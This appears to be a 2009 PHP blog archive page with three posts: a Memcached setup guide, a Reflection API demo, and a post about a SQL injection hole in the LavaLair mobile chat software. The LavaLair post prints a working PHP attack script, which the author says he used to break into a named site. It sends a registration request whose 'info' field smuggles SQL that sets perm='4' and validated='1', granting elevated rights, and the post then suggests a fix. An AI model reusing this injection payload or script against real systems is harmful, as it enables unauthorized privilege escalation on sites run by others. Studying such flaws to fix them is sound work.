Author: masnun

PHP

Using Memcached with PHP

Post author By masnun
Post date October 25, 2009

Memcached could be a very efficient way to scale your web applications. Memcached lets you store data into the cache of your memory and quickly retrieve data when you need. So, it is usually very fast for data storage. But the darker side is that it’s extremely volatile. Your machine crashes or restarts and all the data are gone. Still, memcached is widely used as a caching device to store temporary data for decreasing the load on mysql database.

Memcached is supported by many of the scripting languages. PHP has excellent support it. They have a PECL extension for interacting with Memcached.

=====================
Setting Things Up
=====================

1) Install Memcached on your machine.
2) Install Memcached PECL extension for PHP.
3) Activate Memcache.

1) Installing Memcached:

To install memcached on your Ubuntu type the following command on your terminal and press enter:

sudo apt-get install memcached

1	sudo apt-get install memcached

To install on Windows:

1. Download memcache from code.jellycan.com/memcached/ [grab the ‘win32 binary’ version]
2. Install memcache as a service:
* Unzip and copy the binaries to your desired directory (eg. c:\memcached) [you should see one file, memcached.exe] – thanks to Stephen for the heads up on the new version
* If you’re running Vista, right click on memcached.exe and click Properties. Click the Compatibility tab. Near the bottom you’ll see Privilege Level, check “Run this program as an administrator”.
* Install the service using the command: c:\memcached\memcached.exe -d install from the command line
* Start the server from the Microsoft Management Console or by running one of the following commands: c:\memcached\memcached.exe -d start, or net start “memcached Server”

2) Installing The PECL Extension:

On Ubuntu, use the command on terminal:

sudo pecl install memcached

1	sudo pecl install memcached

On windows, you need to get the memcached PECL extension, put it into the PHP’s extension directory. You might get the file at: http://downloads.php.net/pierre/

Add the extension to php.ini.

On Linux:

extension=memcache.so

1	extension=memcache.so

On Windows:

extension=php_memcache.dll

1	extension=php_memcache.dll

3) Activate:

Make sure that Memcached is running as a daemon/service. If not, use the command:

memcached -d

1	memcached -d

Now start using memcached 🙂

Memcached Demo: How to store an array ?

The Memcached PECL extension has a built in class “Memcache” which we will use to work with Memcached.

<?php
$m = new Memcache; // Create a new Memcache Object
$m->connect("localhost"); // Connect to your own machine

// Define an array
$array = array("name" => "maSnun", "email" => "masnun@leevio.com");

// Store it into memcache
$m->set("data",$array);

// Lets get the data back
$a = $m->get("data");

// Print the data

echo "Name: {$a['name']} \n";
echo "Email: {$a['email']} \n";


?>

<?php

$m = new Memcache; // Create a new Memcache Object

$m->connect("localhost"); // Connect to your own machine

// Define an array

$array = array("name" => "maSnun", "email" => "masnun@leevio.com");

// Store it into memcache

$m->set("data",$array);

// Lets get the data back

$a = $m->get("data");

// Print the data

echo "Name: {$a['name']} \n";

echo "Email: {$a['email']} \n";

Pretty easy… Isn’t it?

PHP

LavaLair SQL Injection Vulnerability: Looking Inside

Post author By masnun
Post date October 12, 2009
19 Comments on LavaLair SQL Injection Vulnerability: Looking Inside

Lavalair is the name of a very popular mobile chat community software developed using PHP MySQL and WML front end. I was once a serious mobile web developer and worked with mobile web apps a lot.

A few days ago, a Indian boy asked for some help with a wapdesire clone of LavaLair. His site was getting hacked by some so-called “hackers”. My experience with LavaLair told me it was some sort of nasty SQL Injection. After having a look at the script, I found out a intensive SQL Injection vulnerability in the registration page. I wrote a CLI php script to inject some SQL codes.

Here is the tool I used to crack into the target site:

<?php
class Browser {
function __construct($ua="") {
$this->UserAgent = $ua;
}
public $curl, $count, $data,$UserAgent;
function url($url) { $this->curl = curl_init($url); }
function fields($count) { $this->count = $count; }
function data($data) { $this->data = strtolower($data); }
function send() {
curl_setopt($this->curl, CURLOPT_POST, $this->count);
if(!empty($this->UserAgent)) {
curl_setopt($this->curl, CURLOPT_USERAGENT, $this->UserAgent);
 }
curl_setopt($this->curl, CURLOPT_POSTFIELDS, $this->data);
curl_setopt($this->curl, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($this->curl);
curl_close($this->curl);
return $result;
}

}

$uid = "masnun";

$info = "fear the geek, since you must!',perm='4',validated='1'#";
$m = new Browser("Samsung SGH C160");
$m->url("http://kalponik.freehostia.com/web/register.php");
$m->fields(12);
$m->data("uid=$uid&pwd=masnun&cpw=masnun&day=31&month=03-&year=1987-&usx=M&ulc=BD&email=none&info=$info");

print_r($m->send());

?>

<?php

class Browser {

function __construct($ua="") {

$this->UserAgent = $ua;

}

public $curl, $count, $data,$UserAgent;

function url($url) { $this->curl = curl_init($url); }

function fields($count) { $this->count = $count; }

function data($data) { $this->data = strtolower($data); }

function send() {

curl_setopt($this->curl, CURLOPT_POST, $this->count);

if(!empty($this->UserAgent)) {

curl_setopt($this->curl, CURLOPT_USERAGENT, $this->UserAgent);

}

curl_setopt($this->curl, CURLOPT_POSTFIELDS, $this->data);

curl_setopt($this->curl, CURLOPT_RETURNTRANSFER, 1);

$result = curl_exec($this->curl);

curl_close($this->curl);

return $result;

}

$uid = "masnun";

$info = "fear the geek, since you must!',perm='4',validated='1'#";

$m = new Browser("Samsung SGH C160");

$m->url("http://kalponik.freehostia.com/web/register.php");

$m->fields(12);

$m->data("uid=$uid&pwd=masnun&cpw=masnun&day=31&month=03-&year=1987-&usx=M&ulc=BD&email=none&info=$info");

print_r($m->send());

The easiest explanation is that LavaLair by default requires magic_quotes_gpc() to be off and it’s insert SQLs are in the format:

insert into table_name set column_1='value_1', column_2 ='value_2'

1	insert into table_name set column_1='value_1', column_2 ='value_2'

So, it becomes easy to inject some single quotes and hash sign to terminate the script and modify it the way you wish.

My suggestion would be to use Insert SQLs in this way:

insert into table_name (column_1,column_2) values ('value_1','value_2')

1	insert into table_name (column_1,column_2) values ('value_1','value_2')

And now a little rant about these so called hackers… I have heard lots of stories about AyOn and some other freaks terrorizing the LL community… It’s really funny the way the developers never bothered to learn how these scrip kiddies or so-called hackers managed their way in… From the very beginning, I have used J21Community with magic_quotes_gpc turned on and secure SQL queries. That’s one of the important reasons why no J21Community site has been hacked yet by SQL Injection… 😀

PHP

Reflection API in PHP

Post author By masnun
Post date October 11, 2009

The reflection API works in a similar way of Python’s dir() function. The API provides a rich set of classes to reverse engineer classes, methods, parameters and functions.

Suppose, we want to explore and reverse engineer a class, then use the following code:

<?php
Reflection::export(new ReflectionClass("Class_Name"));
?>

<?php

Reflection::export(new ReflectionClass("Class_Name"));

For example:

<?php
Reflection::export(new ReflectionClass("ZipArchive"));
?>

<?php

Reflection::export(new ReflectionClass("ZipArchive"));

Outputs:

Class [ <internal:zip> class ZipArchive ] {

  - Constants [43] {
    Constant [ integer CREATE ] { 1 }
    Constant [ integer EXCL ] { 2 }
    Constant [ integer CHECKCONS ] { 4 }
    Constant [ integer OVERWRITE ] { 8 }
    Constant [ integer FL_NOCASE ] { 1 }
    Constant [ integer FL_NODIR ] { 2 }
    Constant [ integer FL_COMPRESSED ] { 4 }
    Constant [ integer FL_UNCHANGED ] { 8 }
    Constant [ integer CM_DEFAULT ] { -1 }
    Constant [ integer CM_STORE ] { 0 }
    Constant [ integer CM_SHRINK ] { 1 }
    Constant [ integer CM_REDUCE_1 ] { 2 }
    Constant [ integer CM_REDUCE_2 ] { 3 }
    Constant [ integer CM_REDUCE_3 ] { 4 }
    Constant [ integer CM_REDUCE_4 ] { 5 }
    Constant [ integer CM_IMPLODE ] { 6 }
    Constant [ integer CM_DEFLATE ] { 8 }
    Constant [ integer CM_DEFLATE64 ] { 9 }
    Constant [ integer CM_PKWARE_IMPLODE ] { 10 }
    Constant [ integer ER_OK ] { 0 }
    Constant [ integer ER_MULTIDISK ] { 1 }
    Constant [ integer ER_RENAME ] { 2 }
    Constant [ integer ER_CLOSE ] { 3 }
    Constant [ integer ER_SEEK ] { 4 }
    Constant [ integer ER_READ ] { 5 }
    Constant [ integer ER_WRITE ] { 6 }
    Constant [ integer ER_CRC ] { 7 }
    Constant [ integer ER_ZIPCLOSED ] { 8 }
    Constant [ integer ER_NOENT ] { 9 }
    Constant [ integer ER_EXISTS ] { 10 }
    Constant [ integer ER_OPEN ] { 11 }
    Constant [ integer ER_TMPOPEN ] { 12 }
    Constant [ integer ER_ZLIB ] { 13 }
    Constant [ integer ER_MEMORY ] { 14 }
    Constant [ integer ER_CHANGED ] { 15 }
    Constant [ integer ER_COMPNOTSUPP ] { 16 }
    Constant [ integer ER_EOF ] { 17 }
    Constant [ integer ER_INVAL ] { 18 }
    Constant [ integer ER_NOZIP ] { 19 }
    Constant [ integer ER_INTERNAL ] { 20 }
    Constant [ integer ER_INCONS ] { 21 }
    Constant [ integer ER_REMOVE ] { 22 }
    Constant [ integer ER_DELETED ] { 23 }
  }

  - Static properties [0] {
  }

  - Static methods [0] {
  }

  - Properties [0] {
  }

  - Methods [27] {
    Method [ <internal:zip> public method open ] {
    }

    Method [ <internal:zip> public method close ] {
    }

    Method [ <internal:zip> public method addEmptyDir ] {
    }

    Method [ <internal:zip> public method addFromString ] {
    }

    Method [ <internal:zip> public method addFile ] {
    }

    Method [ <internal:zip> public method renameIndex ] {
    }

    Method [ <internal:zip> public method renameName ] {
    }

    Method [ <internal:zip> public method setArchiveComment ] {
    }

    Method [ <internal:zip> public method getArchiveComment ] {
    }

    Method [ <internal:zip> public method setCommentIndex ] {
    }

    Method [ <internal:zip> public method setCommentName ] {
    }

    Method [ <internal:zip> public method getCommentIndex ] {
    }

    Method [ <internal:zip> public method getCommentName ] {
    }

    Method [ <internal:zip> public method deleteIndex ] {
    }

    Method [ <internal:zip> public method deleteName ] {
    }

    Method [ <internal:zip> public method statName ] {
    }

    Method [ <internal:zip> public method statIndex ] {
    }

    Method [ <internal:zip> public method locateName ] {
    }

    Method [ <internal:zip> public method getNameIndex ] {
    }

    Method [ <internal:zip> public method unchangeArchive ] {
    }

    Method [ <internal:zip> public method unchangeAll ] {
    }

    Method [ <internal:zip> public method unchangeIndex ] {
    }

    Method [ <internal:zip> public method unchangeName ] {
    }

    Method [ <internal:zip> public method extractTo ] {
    }

    Method [ <internal:zip> public method getFromName ] {
    }

    Method [ <internal:zip> public method getFromIndex ] {
    }

    Method [ <internal:zip> public method getStream ] {
    }
  }
}

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

Class [ <internal:zip> class ZipArchive ] {

- Constants [43] {

Constant [ integer CREATE ] { 1 }

Constant [ integer EXCL ] { 2 }

Constant [ integer CHECKCONS ] { 4 }

Constant [ integer OVERWRITE ] { 8 }

Constant [ integer FL_NOCASE ] { 1 }

Constant [ integer FL_NODIR ] { 2 }

Constant [ integer FL_COMPRESSED ] { 4 }

Constant [ integer FL_UNCHANGED ] { 8 }

Constant [ integer CM_DEFAULT ] { -1 }

Constant [ integer CM_STORE ] { 0 }

Constant [ integer CM_SHRINK ] { 1 }

Constant [ integer CM_REDUCE_1 ] { 2 }

Constant [ integer CM_REDUCE_2 ] { 3 }

Constant [ integer CM_REDUCE_3 ] { 4 }

Constant [ integer CM_REDUCE_4 ] { 5 }

Constant [ integer CM_IMPLODE ] { 6 }

Constant [ integer CM_DEFLATE ] { 8 }

Constant [ integer CM_DEFLATE64 ] { 9 }

Constant [ integer CM_PKWARE_IMPLODE ] { 10 }

Constant [ integer ER_OK ] { 0 }

Constant [ integer ER_MULTIDISK ] { 1 }

Constant [ integer ER_RENAME ] { 2 }

Constant [ integer ER_CLOSE ] { 3 }

Constant [ integer ER_SEEK ] { 4 }

Constant [ integer ER_READ ] { 5 }

Constant [ integer ER_WRITE ] { 6 }

Constant [ integer ER_CRC ] { 7 }

Constant [ integer ER_ZIPCLOSED ] { 8 }

Constant [ integer ER_NOENT ] { 9 }

Constant [ integer ER_EXISTS ] { 10 }

Constant [ integer ER_OPEN ] { 11 }

Constant [ integer ER_TMPOPEN ] { 12 }

Constant [ integer ER_ZLIB ] { 13 }

Constant [ integer ER_MEMORY ] { 14 }

Constant [ integer ER_CHANGED ] { 15 }

Constant [ integer ER_COMPNOTSUPP ] { 16 }

Constant [ integer ER_EOF ] { 17 }

Constant [ integer ER_INVAL ] { 18 }

Constant [ integer ER_NOZIP ] { 19 }

Constant [ integer ER_INTERNAL ] { 20 }

Constant [ integer ER_INCONS ] { 21 }

Constant [ integer ER_REMOVE ] { 22 }

Constant [ integer ER_DELETED ] { 23 }

}

- Static properties [0] {

}

- Static methods [0] {

}

- Properties [0] {

}

- Methods [27] {

Method [ <internal:zip> public method open ] {

}

Method [ <internal:zip> public method close ] {

}

Method [ <internal:zip> public method addEmptyDir ] {

}

Method [ <internal:zip> public method addFromString ] {

}

Method [ <internal:zip> public method addFile ] {

}

Method [ <internal:zip> public method renameIndex ] {

}

Method [ <internal:zip> public method renameName ] {

}

Method [ <internal:zip> public method setArchiveComment ] {

}

Method [ <internal:zip> public method getArchiveComment ] {

}

Method [ <internal:zip> public method setCommentIndex ] {

}

Method [ <internal:zip> public method setCommentName ] {

}

Method [ <internal:zip> public method getCommentIndex ] {

}

Method [ <internal:zip> public method getCommentName ] {

}

Method [ <internal:zip> public method deleteIndex ] {

}

Method [ <internal:zip> public method deleteName ] {

}

Method [ <internal:zip> public method statName ] {

}

Method [ <internal:zip> public method statIndex ] {

}

Method [ <internal:zip> public method locateName ] {

}

Method [ <internal:zip> public method getNameIndex ] {

}

Method [ <internal:zip> public method unchangeArchive ] {

}

Method [ <internal:zip> public method unchangeAll ] {

}

Method [ <internal:zip> public method unchangeIndex ] {

}

Method [ <internal:zip> public method unchangeName ] {

}

Method [ <internal:zip> public method extractTo ] {

}

Method [ <internal:zip> public method getFromName ] {

}

Method [ <internal:zip> public method getFromIndex ] {

}

Method [ <internal:zip> public method getStream ] {

}

Cool, isn’t it? I loved it ! Thanks to Hasin Hayder for referring me to this API.

Read more at: http://www.php.net/language.oop5.reflection 😉

Recent Posts

Recent Comments

Archives

Categories